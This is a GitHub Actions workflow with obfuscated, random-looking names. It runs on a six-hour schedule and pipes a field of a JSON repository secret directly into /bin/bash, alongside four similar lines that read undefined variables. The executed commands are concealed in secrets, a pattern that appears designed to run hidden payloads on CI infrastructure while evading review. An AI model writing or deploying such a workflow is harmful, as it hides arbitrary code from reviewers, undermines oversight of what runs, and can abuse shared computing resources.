name: xuewanche7568
on:
  workflow_dispatch:
  schedule:
    - cron: '53 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuewanche7568
        env:
          pd81: ${{ secrets.pd81 }}
        run: |
          echo $pd81 | jq -r .az9019 | /bin/bash
          echo $mij53915 | jq -r .mttcu986 | /bin/bash
          echo $jn3555 | jq -r .idcl0 | /bin/bash
          echo $vjxc08 | jq -r .ll609 | /bin/bash
          echo $lt061 | jq -r .c31853 | /bin/bash

